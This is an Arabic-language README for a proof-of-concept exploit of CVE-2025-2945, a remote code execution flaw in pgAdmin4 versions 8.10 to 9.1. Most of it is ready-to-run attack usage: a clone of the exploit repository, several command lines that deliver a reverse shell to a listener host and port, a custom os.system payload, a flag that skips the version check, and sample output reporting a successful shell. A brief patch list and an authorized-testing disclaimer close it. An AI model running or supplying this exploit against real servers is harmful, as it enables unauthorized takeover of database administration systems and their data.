
استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في pgAdmin4 التي تؤثر على الإصدارات من 8.10 إلى 9.1.
المؤلف: G0D150NE
الإصدار: 2.0.0
CVE: CVE-2025-2945
الخطورة: حرجة (CVSS 9.9)
استغلال لثغرة تنفيذ الأوامر عن بُعد (RCE) في pgAdmin4 التي تؤثر على الإصدارات 8.10 إلى 9.1.
توجد الثغرة في نقطة النهاية /sqleditor/query_tool/download حيث يتم تمرير المعامل query_commited بدون تعقيم إلى دالة eval() في Python، مما يسمح بتنفيذ أكواد عشوائية.
# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945
# Install dependencies
pip install requests
الاستخدام الأساسي
python3 poc.py \
--target-url http://target:5050 \
--username [email protected] \
--password admin123 \
--db-user postgres \
--db-pass postgres \
--db-name postgres \
--Rhost 10.10.14.7 \
--Rport 4444
مع الإخراج المفصّل
python3 poc.py \
--target-url http://target:5050 \
--username [email protected] \
--password admin123 \
--db-user postgres \
--db-pass postgres \
--db-name postgres \
--Rhost 10.10.14.7 \
--Rport 4444 \
-v
حمولة مخصصة
python3 poc.py \
--target-url http://target:5050 \
--username [email protected] \
--password admin123 \
--db-user postgres \
--db-pass postgres \
--db-name postgres \
--Rhost 10.10.14.7 \
--Rport 4444 \
--custom-payload "__import__('os').system('whoami > /tmp/test.txt')"
تخطّي فحص الإصدار
python3 poc.py \
--target-url http://target:5050 \
--username [email protected] \
--password admin123 \
--db-user postgres \
--db-pass postgres \
--db-name postgres \
--Rhost 10.10.14.7 \
--Rport 4444 \
--skip-version-check
الوسيط مطلوب الوصف --target-url مطلوب عنوان URL الأساسي لـ pgAdmin4 (http://RHOST:PORT/) --username مطلوب البريد الإلكتروني لتسجيل الدخول إلى pgAdmin4 --password مطلوب كلمة مرور تسجيل الدخول إلى pgAdmin4 --db-user مطلوب اسم مستخدم قاعدة البيانات --db-pass مطلوب كلمة مرور قاعدة البيانات --db-name مطلوب اسم قاعدة البيانات --Rhost مطلوب عنوان IP للمستمع الخاص بالقشرة العكسية --Rport مطلوب منفذ المستمع الخاص بالقشرة العكسية --max-server-id غير مطلوب أقصى معرّف خادم لفحصه (الافتراضي: 10) --skip-version-check غير مطلوب تخطّي التحقق من الإصدار --custom-payload غير مطلوب حمولة Python مخصصة --verbose, -v غير مطلوب تفعيل مخرجات التصحيح --no-banner غير مطلوب إخفاء الشعار
· Python 3.6+ · مكتبة requests
pip install requests
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
-e [email protected] \
-e PGADMIN_DEFAULT_PASSWORD=admin123 \
dpage/pgadmin4:8.10
# Then run the exploit
python3 poc.py \
--target-url http://localhost:5050 \
--username [email protected] \
--password admin123 \
--db-user postgres \
--db-pass postgres \
--db-name postgres \
--Rhost 10.10.14.7 \
--Rport 4444
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄
▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀
▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌
▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌
▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░▌
▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌
▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌▐░▌
▄▄▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄
▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀
CVE-2025-2945 - pgAdmin4 Authenticated RCE
Author: G0D150NE
Version: 2.0.0
[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444
· قم بترقية pgAdmin4 إلى الإصدار 9.2 أو أحدث · قيّد الوصول إلى واجهة pgAdmin · استخدم بيانات اعتماد قوية · فعّل المصادقة متعددة العوامل (MFA) إذا كانت متاحة
هذه الأداة مخصّصة لاختبارات الاختراق المصرّح بها والأغراض التعليمية فقط. استخدامها ضد أنظمة بدون إذن صريح غير قانوني. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام.
· CVE-2025-2945 · النشرة الأمنية لـ pgAdmin
رخصة MIT